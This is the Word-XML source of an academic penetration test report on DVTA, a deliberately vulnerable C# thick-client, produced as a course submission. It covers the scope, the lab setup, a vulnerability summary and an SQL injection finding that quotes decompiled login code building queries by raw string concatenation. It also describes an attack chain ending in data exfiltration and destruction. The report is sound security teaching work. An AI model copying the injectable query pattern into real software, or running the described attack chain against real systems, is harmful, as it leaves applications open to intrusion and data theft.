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2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2">
      <w:pPr>
        <w:spacing w:after="60" w:before="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smallCaps w:val="1"/>
          <w:color w:val="7f8c8d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">THICK-CLIENT APPLICATION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:spacing w:after="50" w:before="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56"/>
          <w:szCs w:val="56"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Test Report</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:spacing w:after="0" w:before="7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5">
      <w:pPr>
        <w:spacing w:after="30" w:before="5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8"/>
          <w:szCs w:val="28"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DVTA — Damn Vulnerable Thick Application  v2.0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:spacing w:after="0" w:before="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9"/>
          <w:szCs w:val="19"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">github.com/srini0x00/dvta  |  C# .NET 4.5 Windows Forms</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:spacing w:after="0" w:before="32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
        <w:tblW w:w="7200.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-120.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2800"/>
        <w:gridCol w:w="4400"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2800"/>
            <w:gridCol w:w="4400"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>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08">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Prepared By</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09">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Mu'ath Yousef</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0A">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Institution</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0B">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Tafila Technical University</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0C">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Affiliation</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0D">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NCSC — National Cyber Security Center</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0E">
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="9b00d3"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pP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0F">
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Aref Ruqaa" w:cs="Aref Ruqaa" w:eastAsia="Aref Ruqaa" w:hAnsi="Aref Ruqaa"/>
                <w:color w:val="980000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pP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10">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Course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11">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IT Security C&amp;T — Penetration Testing</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12">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Test Target</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13">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DVTA v2.0 — Windows Thick-Client (C#)</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14">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Test Type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15">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Grey-box — Static Analysis + Dynamic Testing</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16">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Source Basis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17">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Real decompiled source — dnSpy 6.1.8</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18">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Classification</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19">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CONFIDENTIAL — Academic Submission</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0f3460" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="120.0" w:type="dxa"/>
              <w:right w:w="120.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Date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1B">
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Aref Ruqaa" w:cs="Aref Ruqaa" w:eastAsia="Aref Ruqaa" w:hAnsi="Aref Ruqaa"/>
                <w:color w:val="980000"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aref Ruqaa" w:cs="Aref Ruqaa" w:eastAsia="Aref Ruqaa" w:hAnsi="Aref Ruqaa"/>
                <w:color w:val="980000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">March 2026</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:spacing w:after="0" w:before="2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1D">
      <w:pPr>
        <w:spacing w:after="0" w:before="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7f8c8d"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OVERALL RISK RATING: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="c0392b"/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CRITICAL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">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01F">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0">
      <w:pPr>
        <w:spacing w:after="160" w:before="440" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="16213e"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="16213e"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">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This report documents a complete grey-box penetration test of DVTA (Damn Vulnerable Thick Application) v2.0. All findings are based exclusively on real decompiled source code (DBAccessClass.cs, Login.cs, Admin.cs, Main.cs) extracted via dnSpy 6.1.8, combined with static configuration file analysis and live AES decryption. No simulated or inferred evidence is included.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">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3">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Twelve confirmed vulnerabilities were identified across five attack surfaces: SQL injection, credential storage, access control, network transmission, and session management. Five findings are rated Critical. The application presents a complete attack chain from unauthenticated network access to full database compromise, credential exfiltration, and data destruction.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:spacing w:after="0" w:before="12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5">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17" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="18" name="Shape 18"/>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17"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26">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11 — Vulnerability Summary Matrix  (source-confirmed, 12 findings)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:spacing w:after="0" w:before="12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2"/>
        <w:tblW w:w="9026.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-120.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2400"/>
        <w:gridCol w:w="6626"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2400"/>
            <w:gridCol w:w="6626"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>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28">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Total Findings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29">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12 (source-confirmed)</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2A">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Critical (CVSS &gt;= 8.0)</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2B">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5</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2C">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High (CVSS 7.0–7.9)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2D">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4</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2E">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Medium (CVSS 4.0–6.9)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2F">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2</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30">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Info</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31">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1</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3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New vs Original Report</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33">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CWE-312, CWE-321, CWE-532, CWE-384, CWE-307, ANTI-DBG (6 new)</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34">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Evidence Basis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35">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Real dnSpy decompiled source + DVTA.exe.config (live AES decrypt)</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36">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Full Compromise Path</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37">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Confirmed: SQLi </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="c0392b"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="c0392b"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> admin panel </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="c0392b"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="c0392b"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> FTP pivot </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="c0392b"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="c0392b"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> data exfil + destroy</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:spacing w:after="120" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="3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2e86ab"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All steps in the attack chain were executed in a live environment and validated through direct interaction with the application, confirming that exploitation is practical and not theoretical.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">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03A">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3B">
      <w:pPr>
        <w:spacing w:after="160" w:before="440" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="16213e"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="16213e"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Lab Setup &amp; Environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">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15" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="16" name="Shape 16"/>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15"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3D">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1 — Lab environment baseline</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">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
        <w:tblW w:w="9026.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-120.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2400"/>
        <w:gridCol w:w="6626"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2400"/>
            <w:gridCol w:w="6626"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>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3F">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Application</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40">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DVTA v2.0  —  github.com/srini0x00/dvta</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4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Language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42">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C# .NET 4.5 Windows Forms</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43">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Database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44">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SQL Server 2019 Express (instance: .\SQLEXPRESS, user: sa)</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45">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FTP Service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46">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FileZilla Server 0.9.60  (127.0.0.1:21)</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47">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Decompiler</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48">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dnSpy 6.1.8  —  DBAccess.dll + DVTA.exe fully decompiled</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4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Config File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4A">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DVTA.exe.config  —  read and AES key verified</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d5e8f0" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="120.0" w:type="dxa"/>
              <w:right w:w="120.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">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9"/>
                <w:szCs w:val="19"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Analysis Tools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4C">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9"/>
                <w:szCs w:val="19"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Wireshark 4.x  |  Procmon 3.91  |  sqlcmd  |  reg.exe</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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04E">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4F">
      <w:pPr>
        <w:spacing w:after="160" w:before="440" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="16213e"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="16213e"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Vulnerability Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">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All 12 findings below are confirmed from decompiled source code with exact file and line references. No finding is included without source-level or config-level evidence.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:spacing w:after="0" w:before="12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4"/>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05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1  —  SQL Injection — Multiple Methods</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54">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CWE-89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55">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9.8  —  Critical</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">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57">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058">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Fig-02: checkLogin() — string.Concat with raw clientusername and clientpassword (Lines 65–70)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Fig-10: viewExpenses() Line 140 + clearExpenses() Line 161 — inline concat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Additional: addExpenses() Lines 110–122, RegisterUser() Lines 81–92 — all unsanitized</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">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5C">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22" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="23" name="Shape 23"/>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22"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5D">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2 — checkLogin() SQL injection: real decompiled source, DBAccessClass.cs Lines 61–74</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">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5F">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060">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constructs all SQL queries via string.Concat() with raw user-supplied parameters. No SqlParameter, stored procedure, or input validation exists anywhere in the class. The pattern is consistent across five methods.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>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061">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DBAccessClass.cs  Line 63–70  (checkLogin)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">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text = string.Concat(new string[] {</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">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"SELECT * FROM users where username='"  ,  clientusername,</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">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 and password='"  ,  clientpassword, "'"   // RAW INPUT</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">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w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">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SqlCommand sqlCommand = new SqlCommand(text, this.conn);</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">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return sqlCommand.ExecuteReader();  // executed with no parameterization</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
